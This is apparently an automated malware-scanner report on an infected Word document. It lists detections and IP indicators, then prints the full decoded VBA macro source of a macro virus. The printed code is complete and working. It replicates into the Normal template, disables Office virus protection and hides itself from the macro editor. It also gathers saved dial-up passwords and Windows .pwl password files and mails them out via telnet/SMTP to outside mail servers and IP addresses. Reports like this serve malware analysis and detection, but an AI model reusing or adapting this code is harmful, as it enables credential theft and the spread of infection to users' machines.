MALICIOUS
Risk Score: 366

Heuristics (10)

- ClamAV: Doc.Trojan.NPR-2 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.NPR-2
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
  - Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: Shell "telnet", 0
  - VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False
  - AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: Sub AutoOpen()
  - Auto_Close macro [low] OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script: Sub AutoClose()
  - Bare IPv4 address in VBA string literal (3 addresses) [low] OLE_VBA_BARE_IPV4_LITERAL: VBA source contains one or more globally-routable IPv4 addresses as plain string literals with no URL scheme. These are commonly C2 or download hosts that only get http:// prepended at runtime, so the normal URL extractors miss them. Surfaced as http://<ip> IOCs. Private, reserved and version/build-shaped values are excluded.
- Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE: Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://194.186.182.26 (referenced by macro)
  - http://195.75.32.20 (referenced by macro)
  - http://194.67.1.159 (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42850 bytes |

SHA-256: 6a95cc981eadf04a89e478d0b1993fa33e18a7df3a46b417de401b1815d93865
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MSPlus"
Option Explicit
Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hWnd As Long, ByVal Msg As Long, wParam As Any, lParam As Any) As Long
Declare Function FindWindow Lib "user32.dll" Alias _
"FindWindowA" (ByVal lpClassName As Any, _
ByVal lpWindowName As Any) As Long
Sub AutoOpen()
Dim Yes As Boolean
Dim Source As String
Dim VBComponent As Object
On Error Resume Next
ActiveDocument.ShowSpellingErrors = False
ActiveDocument.ShowGrammaticalErrors = False
Source = MacroContainer.FullName
Yes = False
For Each VBComponent In NormalTemplate.VBProject.VBComponents
If VBComponent.Name = "MSPlus" Then
Yes = True
End If
Next
If Yes = False Then
CopyModule NormalTemplate.FullName, Source
End If
Options.VirusProtection = False
Options.SaveNormalPrompt = False
NormalTemplate.Save
End Sub
Sub CopyModule(Target As String, Source_ As String)
Dim VBComponent As Object
On Error Resume Next
Application.OrganizerCopy _
Source:=Source_, _
Destination:=Target, _
Name:="MSPlus", _
Object:=wdOrganizerObjectProjectItems
For Each VBComponent In MacroContainer.VBProject.VBComponents
If VBComponent.Name <> "ThisDocument" Then
Application.OrganizerCopy _
Source:=Source_, _
Destination:=Target, _
Name:=VBComponent.Name, _
Object:=wdOrganizerObjectProjectItems
End If
Next
End Sub
Sub AutoExit()
Application.Visible = False
Tmsn
End Sub
Sub FileOpen()
AutoOpen
Dialogs(80).Show
Tmsn
End Sub
Sub FileSave()
On Error Resume Next
ActiveDocument.Save
Tmsn
End Sub
Sub FileClose()
On Error Resume Next
AutoOpen
ActiveDocument.Close
End Sub
Sub AutoClose()
AutoOpen
End Sub
Sub Tmsn()
Dim Delta As Integer
Dim Old As Byte
Dim NF As Integer
NF = FreeFile
On Error Resume Next
Open "c:\windows\logow.sys" For Binary Access Read As #NF
Get #NF, 76989, Old
Close #NF
Delta = Val(Mid(Date$, 4, 2))
Delta = Delta - Old
Select Case Delta
Case Is > 2
Sender
Case Is < 0 And Delta + 31 > 2
Sender
Case Else
End Select
End Sub
Sub Sender()
Dim Handle As Long
Dim HandleBW As Long
Dim hWnd As Long
Dim FileName As String
Dim Start As Long
Dim MyDat As Byte
Dim i As Integer
Dim NPwl() As String
Dim j As Integer
Dim Title As String
Dim SMTP As String
Dim Host(1 To 5) As String
Dim A() As Integer
Dim f As Integer
Dim NF As Integer
Dim THwnd As Long
Dim TWnd As String
Dim None As String
On Error Resume Next
If Chkip > 400 Then
Host(1) = "chat.ru"
Host(2) = "mail.iname.com"
Host(3) = "194.186.182.26"
Host(4) = "195.75.32.20"
Host(5) = "194.67.1.159"
Loto 5, A()
For f = 1 To 5
Shell "telnet", 0
THwnd = FindWindow(CLng(0), "Telnet - (none)")
If THwnd <> 0 Then
TWnd = "telnet"
None = "(none)"
Else
THwnd = FindWindow(CLng(0), "Телнет - (нет)")
If THwnd <> 0 Then
TWnd = "Телнет - "
None = "(нет)"
Else
THwnd = FindWindow(CLng(0), "Telnet - (нет)")
TWnd = "telnet - "
None = "(нет)"
End If
End If
SendMessage THwnd, CLng(16), ByVal CLng(0), 0
Shell "telnet " + Host(A(f)) + " 25", 0
DoEvents
Start = Timer
Do Until Handle <> 0 Or Timer - Start > 60 Or HandleBW <> 0
Handle = FindWindow(CLng(0), TWnd + " - " + Host(A(f)))
HandleBW = FindWindow(CLng(0), "Connect failed")
DoEvents
Loop
Select Case Handle
Case Is <> 0
SMTP = "helo selena#$mail from: <cookie@mail.ru>#rcpt to: <kashek@usa.net>#$data#$Date: " + _
Date$ + " " + Time$ + "#X-MSMail-Priority: Normal#X-Priority: 3#X-Mailer: Post Messenger 3.1#MIME-Version: 1.0#Content-Type: multipart/mixed; boundary=" _
+ Chr(34) + "----=_NextPart" + Chr(34) + "#Content-Transfer-Encoding: 7bit##------=_NextPart#Content-Type: text/plain; charset=Windows-1251#Content-Transfer-Encoding: base64#"
Filler SMTP, Handle
Pause 1
Grab FileName
SMTP = Base64(FileName)
Kill "c:\windows\" + FileName
SMTP = Adapt(SMTP)
Filler SMTP, Handle
Pause 1
FindPWL i, NPwl()
If i <> 0 Then
For j = 0 To i - 1
If FileLen("c:\windows\" + NPwl(j)) <> 688 Then
SMTP = Base64(NPwl(j))
SMTP = Adapt(SMTP)
Title = "#------=_NextPart#Content-Type: application/octet-stream; name=" + Chr(34) _
+ NPwl(j) + Chr(34) + "#Content-Transfer-Encoding: base64#Content-Description: " + _
NPwl(j) + "(PWL PassWord List)#Content-Disposition: attachment; filename=" _
+ Chr(34) + NPwl(j) + Chr(34) + "#"
Filler Title, Handle
Pause 1
Filler SMTP, Handle
Pause 1
End If
Next
End If
Title = "##------=_NextPart--#.#quit#"
Filler Title, Handle
Pause 1
Start = Timer
Do Until hWnd <> 0 Or Timer - Start > 150
hWnd = FindWindow(CLng(0), TWnd)
DoEvents
Loop
Select Case hWnd
Case Is = 0
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Handle = 0
Case Else
SendMessage hWnd, CLng(16), ByVal CLng(0), 0
NF = FreeFile
MyDat = Val(Mid(Date$, 4, 2))
Open "c:\windows\logow.sys" For Binary Access Write As #NF
Put #NF, 76989, MyDat
Close #NF
DoEvents
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Exit Sub
End Select
Case Else
Handle = FindWindow(CLng(0), TWnd + " - " + None)
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Handle = 0
End Select
Next
End If
End Sub
Function Chkip()
Dim hWnd As Long
Dim Start As Long
Dim A As Long
Dim i As Long
Dim NF As Integer
Dim NF1 As Integer
On Error Resume Next
NF = FreeFile
Open "c:\windows\chkip.bat" For Output Access Write As #NF
Print #NF, "route print > c:\windows\chkip.bmp"
Close #NF
Shell "c:\windows\chkip.bat", 0
Start = Timer
Do While FindWindow(CLng(0), "(Сеанс завершен) - chkip") = 0
DoEvents
If Timer > Start + 10 Then
Exit Function
End If
Loop
hWnd = FindWindow(CLng(0), "(Сеанс завершен) - chkip")
SendMessage hWnd, CLng(16), ByVal CLng(0), 0
Chkip = FileLen("c:\windows\chkip.bmp")
A = 255
NF = FreeFile
Open "c:\windows\chkip.bat" For Binary Access Write As #NF
NF1 = FreeFile
Open "c:\windows\chkip.bmp" For Binary Access Write As #NF1
For i = 1 To LOF(NF)
Put #NF, i, A
Next
For i = 1 To LOF(NF1)
Put #NF1, i, A
Next
Close #NF
Close #NF1
Kill "c:\windows\chkip.bat"
Kill "c:\windows\chkip.bmp"
End Function
Function Loto(i As Integer, A() As Integer)
Dim n As Integer
ReDim A(1 To i) As Integer
Dim Tmp As Integer
Dim Temp As Integer
For n = 1 To i
A(n) = n
Next
For n = 1 To i
Tmp = Int((i - n + 1) * Rnd + n)
Temp = A(n)
A(n) = A(Tmp)
A(Tmp) = Temp
Next
End Function
Sub Filler(MessStr As String, hWnd As Long)
Dim i As Long
Dim Tmp As String
Dim Charset As Long
On Error Resume Next
For i = 1 To Len(MessStr)
Tmp = Mid(MessStr, i, 1)
Select Case Tmp
Case Is = "#"
DoEvents
Charset = SendMessage(hWnd, &H102, ByVal CLng(13), 0)
Case Is = "$"
Pause 7
Case Else
Charset = SendMessage(hWnd, &H102, ByVal CLng(Asc(Tmp)), 0)
End Select
Next
End Sub
Sub Pause(i As Byte)
Dim Start As Long
Start = Timer
Do While Timer < Start + i
DoEvents
Loop
End Sub
Function Grab(Name As String)
Dim Tmp As String
Dim AZ As String
Dim i As Integer
Dim Num As Integer
Dim PwdLst As String
Dim Temp As String
Dim Counter As Long
Dim NF As Integer
Dim NF1 As Integer
AZ = "abcdifghijklmnopqastuvwxyz"
For i = 1 To 7
Num = Random1(25)
Name = Name + Mid(AZ, Num + 1, 1)
Next
Name = Name + ".egn"
On Error Resume Next
NF1 = FreeFile
Open "c:\windows\" + Name For Output Access Write As #NF1
If Dir$("c:\windows\edialer.ini") <> "" Then
NF = FreeFile
Open "c:\windows\edialer.ini" For Input Access Read As #NF
Do While Not EOF(NF)
Line Input #NF, Tmp
If InStr(1, Tmp, "[RAS_Entry_") <> 0 Or _
InStr(1, Tmp, "PasswordSaved") <> 0 Or _
InStr(1, Tmp, "LoginSaved") <> 0 Then
Print #NF1, Tmp
End If
Loop
Close #NF
End If
If Dir$("C:\Windows\system.ini") <> "" Then
NF = FreeFile
Open "C:\Windows\system.ini" For Input Access Read As #NF
Do While Not EOF(NF)
Line Input #NF, Temp
Counter = Counter + 1
If Temp = "[Password Lists]" Then
Do While Temp <> ""
Line Input #NF, Temp
PwdLst = PwdLst + Chr(10) + Temp
Loop
Exit Do
End If
If Counter Mod 20 = 0 Then
DoEvents
End If
Loop
End If
Close #NF
Print #NF1, PwdLst
Close #NF1
End Function
Function Base64(FName As String)
Dim i As Long
Dim ABC As String
Dim Tmp As String
Dim Char As Byte
Dim Cod As Integer
Dim Roll As Integer
Dim Counter As Long
'
Dim HMask As Integer
Dim LMask As Integer
Dim Shift As Integer
Dim NF As Integer
HMask = 252
LMask = 3
Shift = 16
Roll = 0
Counter = 1
ABC = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
NF = FreeFile
On Error Resume Next
Open "c:\windows\" + FName For Binary Access Read As #NF
For i = 1 To LOF(NF)
Get #NF, Counter, Char
Cod = ((Char And HMask) \ (LMask + 1)) Or Roll
Roll = (Char And LMask) * Shift
Tmp = Tmp + Mid$(ABC, Cod + 1, 1)
HMask = HMask * 4 And 255
LMask = LMask * 4 + 3
Shift = Shift \ 4
If HMask = 0 Then
Tmp = Tmp + Mid$(ABC, Roll + 1, 1)
HMask = 252
LMask = 3
Shift = 16
Roll = 0
End If
Counter = Counter + 1
Next
Close #NF
If Shift < 16 Then
Tmp = Tmp + Mid$(ABC, Roll + 1, 1)
End If
Cod = ((Len(Tmp)) Mod 4)
If Cod Then
Tmp = Tmp + String$(4 - Cod, "=")
End If
Base64 = Tmp
End Function
Function FindPWL(j As Integer, FindFiles() As String)
ReDim FindFiles(0)
FindFiles(0) = Dir$("c:\windows\*.pwl")
If FindFiles(0) = "" Then
Exit Function
End If
j = 0
Do While FindFiles(0) <> ""
FindFiles(0) = Dir
j = j + 1
Loop
If j > 1 Then
ReDim FindFiles(0 To j - 1)
FindFiles(0) = Dir$("c:\windows\*.pwl")
For j = 1 To j - 1
FindFiles(j) = Dir$
Next j
Else
FindFiles(0) = Dir$("c:\windows\*.pwl")
End If
End Function
Function Adapt(Cod As String)
Dim PostCod As String
Dim i As Long
On Error Resume Next
For i = 1 To Len(Cod)
If i >= 76 And (i Mod 76) = 0 Then
PostCod = PostCod + Mid(Cod, i, 1) + "#"
Else
PostCod = PostCod + Mid(Cod, i, 1)
End If
Next
Adapt = "#" + PostCod + "#"
End Function
Function Random1(i As Integer)
Dim Resalt As Integer
Resalt = Int(i * Rnd + 1)
Random1 = Resalt
End Function
Sub ViewVBCode()
Deleter
ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
Deleter
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub Deleter()
Dim TempPath As String, TempName As String
Dim Docum As Object
Dim VBComp As Object
On Error Resume Next
For Each VBComp In NormalTemplate.VBProject.VBComponents
If VBComp.Name <> "ThisDocument" Then
With NormalTemplate.VBProject.VBComponents(VBComp.Name).CodeModule
.DeleteLines 1, .CountOfLines
End With
Application.OrganizerDelete NormalTemplate.Name, VBComp.Name, wdOrganizerObjectProjectItems
End If
Next
For Each VBComp In ActiveDocument.VBProject.VBComponents
Debug.Print VBComp.Name
If VBComp.Name <> "ThisDocument" Then
With ActiveDocument.VBProject.VBComponents(VBComp.Name).CodeModule
.DeleteLines 1, .CountOfLines
End With
Application.OrganizerDelete ActiveDocument.Name, VBComp.Name, wdOrganizerObjectProjectItems
End If
Next
Options.SaveNormalPrompt = True
End Sub
Sub ToolsOptions()
With Options
.VirusProtection = True
.SaveNormalPrompt = True
End With
Dialogs(wdDialogToolsOptions).Show
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub